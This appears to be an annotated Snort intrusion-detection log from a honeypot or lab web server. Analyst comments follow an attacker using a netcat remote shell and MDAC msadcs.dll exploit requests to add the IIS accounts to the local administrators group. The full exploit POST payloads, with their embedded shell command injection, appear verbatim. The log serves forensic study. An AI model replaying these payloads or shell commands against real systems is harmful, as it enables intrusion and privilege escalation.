***AP*** Seq: 0x2CBF0158 Ack: 0x9E43FD7F Win: 0x1FD2 TcpLen: 20
System error 1312 has occurred...... A specified logon session d
oes not exist. It may already have... been terminated........C:
\>..C:\>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:51:44.097712 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:16251 IpLen:20 DgmLen:65 DF
***AP*** Seq: 0x2CBF01E0 Ack: 0x9E43FD98 Win: 0x1FB9 TcpLen: 20
net group domain admins..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:51:44.626271 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:16763 IpLen:20 DgmLen:272 DF
***AP*** Seq: 0x2CBF01F9 Ack: 0x9E43FD98 Win: 0x1FB9 TcpLen: 20
The syntax of this command is:.......NET GROUP [groupname [/COMM
ENT:"text"]] [/DOMAIN].. groupname {/ADD [/COMMENT:"tex
t"] | /DELETE} [/DOMAIN].. groupname username [...] {/
ADD | /DELETE} [/DOMAIN]......C:\>..C:\>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:51:54.612905 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:19323 IpLen:20 DgmLen:176 DF
***AP*** Seq: 0x2CBF02E1 Ack: 0x9E43FDA9 Win: 0x1FA8 TcpLen: 20
.[Anet group /?..The name specified is not recognized as an..int
ernal or external command, operable program or batch file.....C:
\>..C:\>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:51:59.525411 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:21371 IpLen:20 DgmLen:54 DF
***AP*** Seq: 0x2CBF0369 Ack: 0x9E43FDB7 Win: 0x1F9A TcpLen: 20
net group ??..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:52:00.055057 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:21627 IpLen:20 DgmLen:272 DF
***AP*** Seq: 0x2CBF0377 Ack: 0x9E43FDB7 Win: 0x1F9A TcpLen: 20
The syntax of this command is:.......NET GROUP [groupname [/COMM
ENT:"text"]] [/DOMAIN].. groupname {/ADD [/COMMENT:"tex
t"] | /DELETE} [/DOMAIN].. groupname username [...] {/
ADD | /DELETE} [/DOMAIN]......C:\>..C:\>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:52:02.926866 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:23419 IpLen:20 DgmLen:54 DF
***AP*** Seq: 0x2CBF045F Ack: 0x9E43FDC5 Win: 0x1F8C TcpLen: 20
net group /?..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:52:03.452181 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:23675 IpLen:20 DgmLen:272 DF
***AP*** Seq: 0x2CBF046D Ack: 0x9E43FDC5 Win: 0x1F8C TcpLen: 20
The syntax of this command is:.......NET GROUP [groupname [/COMM
ENT:"text"]] [/DOMAIN].. groupname {/ADD [/COMMENT:"tex
t"] | /DELETE} [/DOMAIN].. groupname username [...] {/
ADD | /DELETE} [/DOMAIN]......C:\>..C:\>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:52:09.584701 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:25723 IpLen:20 DgmLen:52 DF
***AP*** Seq: 0x2CBF0555 Ack: 0x9E43FDD1 Win: 0x1F80 TcpLen: 20
net group ..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:52:10.079461 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:25979 IpLen:20 DgmLen:292 DF
***AP*** Seq: 0x2CBF0561 Ack: 0x9E43FDD1 Win: 0x1F80 TcpLen: 20
..Group Accounts for \\.....------------------------------------
-------------------------------------------..*Domain Admins
*Domain Guests *Domain Users ..The
command completed with one or more errors........C:\>..C:\>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:52:32.169335 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:28539 IpLen:20 DgmLen:56 DF
***AP*** Seq: 0x2CBF065D Ack: 0x9E43FDE1 Win: 0x1F70 TcpLen: 20
net localgroup..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:52:32.704689 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:28795 IpLen:20 DgmLen:176 DF
***AP*** Seq: 0x2CBF066D Ack: 0x9E43FDE1 Win: 0x1F70 TcpLen: 20
System error 1312 has occurred...... A specified logon session d
oes not exist. It may already have... been terminated........C:
\>..C:\>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:52:48.291518 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:32635 IpLen:20 DgmLen:71 DF
***AP*** Seq: 0x2CBF06F5 Ack: 0x9E43FE00 Win: 0x1F51 TcpLen: 20
net localgroup /domain admins..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:52:48.826409 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:32891 IpLen:20 DgmLen:176 DF
***AP*** Seq: 0x2CBF0714 Ack: 0x9E43FE00 Win: 0x1F51 TcpLen: 20
System error 1312 has occurred...... A specified logon session d
oes not exist. It may already have... been terminated........C:
\>..C:\>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:53:06.418014 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:36731 IpLen:20 DgmLen:70 DF
***AP*** Seq: 0x2CBF079C Ack: 0x9E43FE1E Win: 0x1F33 TcpLen: 20
net localgroup domain admins..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:53:06.957276 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:36987 IpLen:20 DgmLen:281 DF
***AP*** Seq: 0x2CBF07BA Ack: 0x9E43FE1E Win: 0x1F33 TcpLen: 20
The syntax of this command is:.......NET LOCALGROUP [groupname [
/COMMENT:"text"]] [/DOMAIN].. groupname {/ADD [/COM
MENT:"text"] | /DELETE} [/DOMAIN].. groupname name
[...] {/ADD | /DELETE} [/DOMAIN]......C:\>..C:\>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:53:07.670085 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:37243 IpLen:20 DgmLen:281 DF
***AP*** Seq: 0x2CBF07BA Ack: 0x9E43FE1E Win: 0x1F33 TcpLen: 20
The syntax of this command is:.......NET LOCALGROUP [groupname [
/COMMENT:"text"]] [/DOMAIN].. groupname {/ADD [/COM
MENT:"text"] | /DELETE} [/DOMAIN].. groupname name
[...] {/ADD | /DELETE} [/DOMAIN]......C:\>..C:\>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:53:27.259389 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:38779 IpLen:20 DgmLen:51 DF
***AP*** Seq: 0x2CBF08AB Ack: 0x9E43FE29 Win: 0x1F28 TcpLen: 20
net users..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# From remote shell, the intruder plaus around with various net commands
!@# Likely this is an effort to try to discover the name of the local administrators group.
!@# The command which would reveal this 'net localgroup' will not run.
[**] netcat session 6969 [**]
02/04-05:53:27.781758 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:39035 IpLen:20 DgmLen:315 DF
***AP*** Seq: 0x2CBF08B6 Ack: 0x9E43FE29 Win: 0x1F28 TcpLen: 20
..User accounts for \\.....-------------------------------------
------------------------------------------..Administrator
Guest IUSR_KENNY ..IWAM_KE
NNY ..The command completed with one or more error
s........C:\>..C:\>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Uses MDAC vulnerability to try to add user 'IWAM_KENNY' to the localgroup 'Domain Admins' (which doesn't exist)
[**] WEB-IIS msadc/msadcs.dll access [**]
02/04-05:53:40.771431 213.116.251.162:1940 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:12871 IpLen:20 DgmLen:795 DF
***AP*** Seq: 0xA81CDD63 Ack: 0x2CC89868 Win: 0x2238 TcpLen: 20
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-
Agent: ACTIVEDATA..Host: lab.wiretrip.net..Content-Length: 601..
Connection: Keep-Alive....ADCClientVersion:01.06..Content-Type:
multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=3....--
!ADM!ROX!YOUR!WORLD!..Content-Type: application/x-varg..Content-
Length: 392..............S.e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m
.e.r.s. .w.h.e.r.e. .C.i.t.y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .n
.e.t. .l.o.c.a.l.g.r.o.u.p. .D.o.m.a.i.n. .A.d.m.i.n.s. .I.W.A.M
._.K.E.N.N.Y. ./.A.D.D.".).|.'.......d.r.i.v.e.r.=.{.M.i.c.r.o.s
.o.f.t. .A.c.c.e.s.s. .D.r.i.v.e.r. .(.*...m.d.b.).}.;.d.b.q.=.c
.:.\.w.i.n.n.t.\.h.e.l.p.\.i.i.s.\.h.t.m.\.t.u.t.o.r.i.a.l.\.b.t
.c.u.s.t.m.r...m.d.b.;...--!ADM!ROX!YOUR!WORLD!--..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Uses MDAC vulnerability to try to add user 'IUSR_KENNY' to the localgroup 'Domain Admins' (which doesn't exist)
!@# One of these should be the web server account (and thus the account that the remote shell is running as)
[**] WEB-IIS msadc/msadcs.dll access [**]
02/04-05:54:03.153709 213.116.251.162:1943 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:12889 IpLen:20 DgmLen:795 DF
***AP*** Seq: 0xA8750ED0 Ack: 0x2CC8F04E Win: 0x2238 TcpLen: 20
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-
Agent: ACTIVEDATA..Host: lab.wiretrip.net..Content-Length: 601..
Connection: Keep-Alive....ADCClientVersion:01.06..Content-Type:
multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=3....--
!ADM!ROX!YOUR!WORLD!..Content-Type: application/x-varg..Content-
Length: 392..............S.e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m
.e.r.s. .w.h.e.r.e. .C.i.t.y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .n
.e.t. .l.o.c.a.l.g.r.o.u.p. .D.o.m.a.i.n. .A.d.m.i.n.s. .I.U.S.R
._.K.E.N.N.Y. ./.A.D.D.".).|.'.......d.r.i.v.e.r.=.{.M.i.c.r.o.s
.o.f.t. .A.c.c.e.s.s. .D.r.i.v.e.r. .(.*...m.d.b.).}.;.d.b.q.=.c
.:.\.w.i.n.n.t.\.h.e.l.p.\.i.i.s.\.h.t.m.\.t.u.t.o.r.i.a.l.\.b.t
.c.u.s.t.m.r...m.d.b.;...--!ADM!ROX!YOUR!WORLD!--..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Tests the priviledges of the remote shell by running 'net session'.
[**] netcat session 6969 [**]
02/04-05:54:10.507763 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:45691 IpLen:20 DgmLen:53 DF
***AP*** Seq: 0x2CBF09C9 Ack: 0x9E43FE36 Win: 0x1F1B TcpLen: 20
net session..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Still denied
[**] netcat session 6969 [**]
02/04-05:54:11.036185 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:45947 IpLen:20 DgmLen:107 DF
***AP*** Seq: 0x2CBF09D6 Ack: 0x9E43FE36 Win: 0x1F1B TcpLen: 20
System error 5 has occurred......Access is denied........C:\>..C
:\>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:54:38.643320 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:52603 IpLen:20 DgmLen:198 DF
***AP*** Seq: 0x2CBF0A19 Ack: 0x9E43FE5D Win: 0x1EF4 TcpLen: 20
.[A.[A.[Anet localgroup domain admins..The name specified is not
recognized as an..internal or external command, operable progra
m or batch file.....C:\>..C:\>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:54:43.650438 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:54907 IpLen:20 DgmLen:65 DF
***AP*** Seq: 0x2CBF0AB7 Ack: 0x9E43FE76 Win: 0x1EDB TcpLen: 20
net group domain admins..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:54:44.182811 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:55163 IpLen:20 DgmLen:272 DF
***AP*** Seq: 0x2CBF0AD0 Ack: 0x9E43FE76 Win: 0x1EDB TcpLen: 20
The syntax of this command is:.......NET GROUP [groupname [/COMM
ENT:"text"]] [/DOMAIN].. groupname {/ADD [/COMMENT:"tex
t"] | /DELETE} [/DOMAIN].. groupname username [...] {/
ADD | /DELETE} [/DOMAIN]......C:\>..C:\>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Lists out users in local administrators group
[**] netcat session 6969 [**]
02/04-05:55:45.142949 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:60539 IpLen:20 DgmLen:71 DF
***AP*** Seq: 0x2CBF0BB8 Ack: 0x9E43FE95 Win: 0x1EBC TcpLen: 20
net localgroup administrators..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:55:45.658231 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:60795 IpLen:20 DgmLen:335 DF
***AP*** Seq: 0x2CBF0BD7 Ack: 0x9E43FE95 Win: 0x1EBC TcpLen: 20
Alias name administrators..Comment Members can fully
administer the computer/domain....Members.....------------------
-------------------------------------------------------------..A
dministrator Domain Admins ..The command c
ompleted successfully........C:\>..C:\>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Realizes his mistake and uses MDAC vulnerability to add the same two accounts to the localgroup 'administrators'
[**] WEB-IIS msadc/msadcs.dll access [**]
02/04-05:56:05.379837 213.116.251.162:1946 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:12965 IpLen:20 DgmLen:797 DF
***AP*** Seq: 0xAA4849C6 Ack: 0x2CCACD70 Win: 0x2238 TcpLen: 20
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-
Agent: ACTIVEDATA..Host: lab.wiretrip.net..Content-Length: 603..
Connection: Keep-Alive....ADCClientVersion:01.06..Content-Type:
multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=3....--
!ADM!ROX!YOUR!WORLD!..Content-Type: application/x-varg..Content-
Length: 394..............S.e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m
.e.r.s. .w.h.e.r.e. .C.i.t.y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .n
.e.t. .l.o.c.a.l.g.r.o.u.p. .a.d.m.i.n.i.s.t.r.a.t.o.r.s. .I.U.S
.R._.K.E.N.N.Y. ./.A.D.D.".).|.'.......d.r.i.v.e.r.=.{.M.i.c.r.o
.s.o.f.t. .A.c.c.e.s.s. .D.r.i.v.e.r. .(.*...m.d.b.).}.;.d.b.q.=
.c.:.\.w.i.n.n.t.\.h.e.l.p.\.i.i.s.\.h.t.m.\.t.u.t.o.r.i.a.l.\.b
.t.c.u.s.t.m.r...m.d.b.;...--!ADM!ROX!YOUR!WORLD!--..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] WEB-IIS msadc/msadcs.dll access [**]
02/04-05:56:17.287747 213.116.251.162:1948 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:12977 IpLen:20 DgmLen:797 DF
***AP*** Seq: 0xAA76D671 Ack: 0x2CCAFBF3 Win: 0x2238 TcpLen: 20
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-
Agent: ACTIVEDATA..Host: lab.wiretrip.net..Content-Length: 603..
Connection: Keep-Alive....ADCClientVersion:01.06..Content-Type:
multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=3....--
!ADM!ROX!YOUR!WORLD!..Content-Type: application/x-varg..Content-
Length: 394..............S.e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m
.e.r.s. .w.h.e.r.e. .C.i.t.y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .n
.e.t. .l.o.c.a.l.g.r.o.u.p. .a.d.m.i.n.i.s.t.r.a.t.o.r.s. .I.W.A
.M._.K.E.N.N.Y. ./.A.D.D.".).|.'.......d.r.i.v.e.r.=.{.M.i.c.r.o
.s.o.f.t. .A.c.c.e.s.s. .D.r.i.v.e.r. .(.*...m.d.b.).}.;.d.b.q.=
.c.:.\.w.i.n.n.t.\.h.e.l.p.\.i.i.s.\.h.t.m.\.t.u.t.o.r.i.a.l.\.b
.t.c.u.s.t.m.r...m.d.b.;...--!ADM!ROX!YOUR!WORLD!--..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:56:27.823385 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:2684 IpLen:20 DgmLen:193 DF
***AP*** Seq: 0x2CBF0CFE Ack: 0x9E43FEB7 Win: 0x1E9A TcpLen: 20
.[Anet localgroup administrators..The name specified is not reco
gnized as an..internal or external command, operable program or
batch file.....C:\>..C:\>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:56:34.132619 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:3452 IpLen:20 DgmLen:71 DF
***AP*** Seq: 0x2CBF0D97 Ack: 0x9E43FED6 Win: 0x1E7B TcpLen: 20
net localgroup administrators..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Uses remote shell to list out local administrators group and sees that the accounts are now included.
[**] netcat session 6969 [**]
02/04-05:56:34.639506 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:3708 IpLen:20 DgmLen:387 DF
***AP*** Seq: 0x2CBF0DB6 Ack: 0x9E43FED6 Win: 0x1E7B TcpLen: 20
Alias name administrators..Comment Members can fully
administer the computer/domain....Members.....------------------
-------------------------------------------------------------..A
dministrator Domain Admins IUSR_KENNY
..IWAM_KENNY ..The command completed suc
cessfully........C:\>..C:\>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:56:38.640140 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:4988 IpLen:20 DgmLen:53 DF
***AP*** Seq: 0x2CBF0F11 Ack: 0x9E43FEE3 Win: 0x1E6E TcpLen: 20
net session..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Tests his/her work by running 'net session' command from remote shell
!@# Access still denied.
[**] netcat session 6969 [**]
02/04-05:56:39.140703 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:5244 IpLen:20 DgmLen:107 DF
***AP*** Seq: 0x2CBF0F1E Ack: 0x9E43FEE3 Win: 0x1E6E TcpLen: 20
System error 5 has occurred......Access is denied........C:\>..C
:\>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:56:42.745289 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:5756 IpLen:20 DgmLen:240 DF
***AP*** Seq: 0x2CBF0F61 Ack: 0x9E43FEE8 Win: 0x1E69 TcpLen: 20
dir.. Volume in drive C has no label... Volume Serial Number is
8403-6A0E.... Directory of C:\....11/26/00 12:34p
0 AUTOEXEC.BAT..11/26/00 06:57p 322 bo
ot.ini..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:56:43.341083 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:6012 IpLen:20 DgmLen:759 DF
***AP*** Seq: 0x2CBF1029 Ack: 0x9E43FEE8 Win: 0x1E69 TcpLen: 20
11/26/00 12:34p 0 CONFIG.SYS..12/26/00 07:
36p exploits..12/07/00 03:30p InetPub..12/07/00 03:12p Multi
media Files..12/26/00 07:10p New Folder..
01/26/01 02:10p 78,643,200 pagefile.sys..12/21/00 0
8:59p Program Files..02/04/01 06:49a
69 README.NOW.Hax0r..12/21/00 08:59p TEMP..02/04/01 06:55a WINNT..1
2/26/00 07:09p wiretrip..02/04/01 06:43a
0 yay.txt.. 14 File(s) 78,
643,591 bytes.. 1,690,852,864 bytes fre
e....C:\>..C:\>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:56:53.360529 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:8060 IpLen:20 DgmLen:96 DF
***AP*** Seq: 0x2CBF12F8 Ack: 0x9E43FEFC Win: 0x1E55 TcpLen: 20
cd program files....C:\Program Files>..C:\Program Files>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:56:53.761423 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:8316 IpLen:20 DgmLen:240 DF
***AP*** Seq: 0x2CBF1330 Ack: 0x9E43FEFF Win: 0x1E52 TcpLen: 20
dir.. Volume in drive C has no label... Volume Serial Number is
8403-6A0E.... Directory of C:\Program Files....12/21/00 08:59p
...12/21/00 08:59p
....12/0
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:56:54.263026 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:8572 IpLen:20 DgmLen:645 DF
***AP*** Seq: 0x2CBF13F8 Ack: 0x9E43FEFF Win: 0x1E52 TcpLen: 20
7/00 03:11p Common Files..12/21/00 08:59
p D4..12/07/00 03:23p
ICW-Internet Connection Wizard..12/07/00 03:37p
Microsoft FrontPage..12/07/00 03:34p
Mts..12/07/00 03:23p Outlook Expres
s..11/26/00 06:42p Plus!..12/16/00 06:54
p Syslogd..11/26/00 06:56p
Windows NT.. 11 File(s) 0 byte
s.. 1,690,852,864 bytes free....C:\Prog
ram Files>..C:\Program Files>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:56:56.965862 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:9852 IpLen:20 DgmLen:121 DF
***AP*** Seq: 0x2CBF1655 Ack: 0x9E43FF10 Win: 0x1E41 TcpLen: 20
cd common files....C:\Program Files\Common Files>..C:\Program Fi
les\Common Files>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:56:57.867431 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:10364 IpLen:20 DgmLen:240 DF
***AP*** Seq: 0x2CBF16A6 Ack: 0x9E43FF15 Win: 0x1E3C TcpLen: 20
dir.. Volume in drive C has no label... Volume Serial Number is
8403-6A0E.... Directory of C:\Program Files\Common Files....12/0
7/00 03:11p ...12/07/00 03:11p
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:56:58.363221 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:10620 IpLen:20 DgmLen:410 DF
***AP*** Seq: 0x2CBF176E Ack: 0x9E43FF15 Win: 0x1E3C TcpLen: 20
....12/07/00 03:23p Microsoft Shared
..12/07/00 03:35p ODBC..12/07/00 03:23p
Services..12/07/00 03:23p
System.. 6 File(s) 0 bytes..
1,690,852,864 bytes free....C:\Program F
iles\Common Files>..C:\Program Files\Common Files>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:57:03.775916 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:12412 IpLen:20 DgmLen:157 DF
***AP*** Seq: 0x2CBF18E0 Ack: 0x9E43FF1E Win: 0x1E33 TcpLen: 20
cd obdc..The system cannot find the path specified.....C:\Progra
m Files\Common Files>..C:\Program Files\Common Files>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:57:04.677543 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:12924 IpLen:20 DgmLen:240 DF
